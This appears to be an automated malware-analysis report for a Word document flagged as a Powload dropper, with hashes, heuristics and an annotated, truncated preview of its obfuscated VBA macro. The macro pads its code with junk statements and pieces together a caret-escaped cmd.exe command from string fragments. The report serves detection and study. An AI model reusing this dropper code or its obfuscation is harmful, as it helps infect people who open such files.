Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 af63dcc1ceb83cb5…

MALICIOUS

Office (OLE)

Size: 78.0 KB · Created: 2018-08-30 03:16:00 · Authoring application: Microsoft Office Word · First seen: 2019-06-27
MD5: cc2517038a511c78d599e6182c2e79a8 SHA-1: cac89deef3d49b5b44385c5fff7ca204924026c7 SHA-256: af63dcc1ceb83cb5ade6b069bd5ba166ced02a30f0fa894594fa385cfc737907
Risk score: 202

Heuristics (6)

  • ClamAV: Doc.Dropper.Powload-6666754-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6666754-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    A call to the VBA Shell() function was found in the macro code.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The document contains an AutoOpen macro, which Word runs automatically when the document is opened.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This heuristic is analyst-facing evidence of a legacy Word macro auto-execution surface; on its own it does not attribute the sample to a downloader family or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for the channel (macro, JS, link annotation, document body, ...) in which each URL was found.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9761 bytes
SHA-256: a621aab5cb0d8b3137c92e01c20417456b5e0467c3dae095cc4ed7948211c1b4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "imVaLvfjzL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XAjBTiimzpdzNE"
Function KukiazMIQE()
' Analyst note: this function builds and returns a single string from nine
' fragments (see the assignment to KukiazMIQE near the end). Nothing else in
' the body contributes to the returned value.

On _
Error _
Resume _
Next
' "On Error Resume Next" written across line continuations: any runtime error
' raised below is silently swallowed, so the junk statements cannot abort the
' function.
Hour 36104 / qHACX
   Hour hOOzO * KEBVfX * Rriqhj * 29853
' The bare "Hour <expr>" statements throughout this function call the built-in
' Hour() and discard the result. Their operands are names that are never
' assigned anywhere in the visible preview, so they do not affect the returned
' string; they read as padding inserted to break signature matching.
hZAnFYCERoz = "m" + "d /V" + "^:^" + "ON/" + "C" + Chr(3 + 5 + 4 + 5 + 17) + "^" + "s^e" + "t ^3r=" + "AAC^A^" + "g"
' Chr(3 + 5 + 4 + 5 + 17) evaluates to Chr(34), a double-quote character.
' Read with the carets ignored, this first fragment resembles a cmd.exe
' "/V:ON /C" prefix followed by a "set" — presumably the caret is relied on as
' the shell's escape character and is dropped at run time; confirm against the
' truncated remainder of the script before treating that as established.
Hour hAXMA * bUKdIp
rElmCSfn = "^A" + "^A" + "I^A" + "AC" + "^Ag" + "^A" + "AI^" + "AA" + "C^" + "A"
Hour JaZAUt * bpBGF / szquT * fPBER
   Hour 41721 * LIXsjw
   Hour bPWJUc / aszwZ
   Hour SzSKA * kjNjub / 86369 / ZVJYDQ
vzMivMtqo = "^g^AA" + "I" + "^" + "A^AC" + "A^g^AA" + "IA^AC^"
Hour iCwqk / 24131
   Hour 16641 / zbSJi / VUkfP * TasFur
   Hour 17381 / zNYLQI
   Hour HLiXh * kntlim * 62155 / WQpuT
   Hour 54550 / YSOJvQ * 51367 * Ktfmw
   Hour 23175 / TEOlZ
zVVnF = "Ag^AA" + "^I^A^AC" + "^AgA^Q" + "f" + "^" + "A0^HA^" + "7" + "B^A^aA" + "^M"
Hour 16865 / mSLzzh
tdjQLSnXn = "^GA^0" + "B" + "^Q^Y^" + "A" + "MGA9^Bw" + "^OA" + "^s^GA^" + "h^BQ^ZA" + "^IH^A^i"
Hour zoYqF / dfnMJX * TMrak / tHoDj
   Hour SuBzI / zwFZwt
   Hour 21872 / ksbYX / BObut / 48614
   Hour cQiYkO * bTmcTn
qJJbpaW = "^Bw^O" + "^AwE^AB" + "^B^Qa" + "A^QC^A^" + "g^A^" + "Qb^A^" + "U^GA"
Hour Gwalp / CjGvdS * znUsQ / BkrOI
   Hour zSAVP / 66502 / 22810 / 40456
   Hour ucOnaB * pYiOh * pYMcb * iiuhjn
   Hour 33420 * ZEOMwY
hBqAoQjfaK = "0B" + "Q^S" + "^" + "A^0C" + "^AlB^wa" + "^" + "A^8^G^A" + "^2^Bg" + "bA^k"
Hour 95883 * FjcvP * viAYKO * FGswCn
   Hour vTYWlO * oRliM * JzMDR * 2077
   Hour 91113 / zjfVvU * VAjwsN * uqzCsj
   Hour CoPtG / VwYOH * mwPuE / EiXiSB
   Hour zGDkq / FrdqF
SNwScZVDY = "EA^7AQ" + "^KA" + "w" + "^E^A^B" + "BQa^AQC" + "^Ag"
Hour 13031 * YWNBoN
   Hour ACHil * CzaEzR
oMuzfG = "^A" + "A^L^A" + "0" + "^EA^qB" + "Q" + "^YAQC" + "^A" + "^oA" + "QZAw^G" + "^ApB^g"
' Return value: the nine fragments joined in order. The fragments after the
' first are not decoded here, and the visible preview does not show where the
' result is consumed (the extracted script is truncated).
KukiazMIQE = hZAnFYCERoz + rElmCSfn + vzMivMtqo + zVVnF + tdjQLSnXn + qJJbpaW + hBqAoQjfaK + SNwScZVDY + oMuzfG
   Hour 6787 * 25706
   Hour 75549 * vIuSZ
   Hour 57531 / WkQtP
   Hour wnYhzJ / TszZD
   Hour 15526 / KqqHf / QuErc / CmzIZ
End Function
Function ZEwiaLi()
' Analyst note: same construction as KukiazMIQE above — the function returns
' eight string fragments joined in order (assignment to ZEwiaLi near the end).
' The bare "Hour <expr>" statements call the built-in Hour() and discard the
' result; their operands are never assigned in the visible preview, so they
' contribute nothing to the returned value.

On _
Error _
Resume _
Next
' Errors from the junk statements below are swallowed by the
' "On Error Resume Next" written across the line continuations above.
Hour ZZDIU * itUpWw
   Hour zwOJlN * wEojr
jGLYqNtHtC = "R" + "A^" + "Q^G^Ah^" + "Bwb^AwG" + "A^" + "u^Bw^" + "dA^" + "8" + "^GA^" + "EB^gL^" + "AI^F" + "A6^BQ^a"
Hour BhOzWm * kODEj * zCUWlj / DwOhDt
   Hour 10330 * tBNGi * 47570 / oKYBNo
   Hour 80643 / IlzAM
   Hour rApEMU * cjVRv
VGnAEl = "A^" + "QC" + "A^7^B" + "^Q" + "^" + "e^AI" + "H" + "^A^0^Bw" + "^e^AkC" + "A" + "^MB^wRA"
Hour 98606 * ZrBqI
   Hour ScbOw * Twajdq
qEjVf = "^M" + "HA^k^A" + "A" + "^I^A^4^" + "G^Ap^B" + "^AI^" + "A0E^Aq^" + "B" + "^" + "Q^Y"
Hour FwMvac * mziVw
   Hour 52704 / wjCSj
CdwizcBPVjD = "^AQCAo" + "^AA^a^" + "A^MG^A" + "h^BQ^Z^" + "A^IH^" + "Av" + "^B" + "^"
Hour 65881 * 48235 * twCHZi * OwtHZF
   Hour 88108 / 8748 * cwZPr * 49805
   Hour lzLHL / 84641 * zTnBXQ * vARjH
pSnNUXi = "g^ZA^s^" + "D^" + "A" + "n^AQZA" + "g^" + "HA^" + "l^BgL^" + "A" + "cCArAQb"
Hour hDPvj / hviKm
   Hour 98793 * kFcYW
vfQHsViY = "^AcH" + "AhBA^" + "J^" + "AsC^AnA" + "AXAcC^A" + "rA^w^Y^" + "A^k" + "^G^A^"
Hour WAfSO * LjFnwG / 78549 * mUdCP
   Hour 38002 / tGLsm
   Hour 86689 / wXKuKv / 6343 * XsoriS
   Hour 34240 / RHYOwH / bICwj * GKoLRX
GpaXdlkiEdX = "sB" + "gY" + "AU^HAw" + "BgO^A" + "^Y^H"
Hour AGvRu * tvhXD
   Hour PwZqG / UhPIa * UGYHWz / dmmrLX
NhSBjU = "Au^B" + "^Q^Z^A" + "^QC^" + "A9AAT" + "^A^E" + "^EAp" + "^BAJAs" + "^D" + "AnA" + "^QO" + "Ak^DA3^" + "AwJ^A^A"
' Return value: the eight fragments concatenated. The visible preview does not
' show the caller that combines this with the other functions' output, and the
' fragment content is not decoded here.
ZEwiaLi = jGLYqNtHtC + VGnAEl + qEjVf + CdwizcBPVjD + pSnNUXi + vfQHsViY + GpaXdlkiEdX + NhSBjU
   Hour 21724 * VSQcG
   Hour iUrsYw / IlCfFi / 73694 * wUVazU
End Function
Function YWmSMuXAw()

On _
Error _
Resume _
Next
Hour GuJSWG / BBXjiM / nqilzF * DRrIt
   Hour tuzuQ / XVcQWT / 34304 / uzBtrB
   Hour bMXRW / nFlz
... (truncated)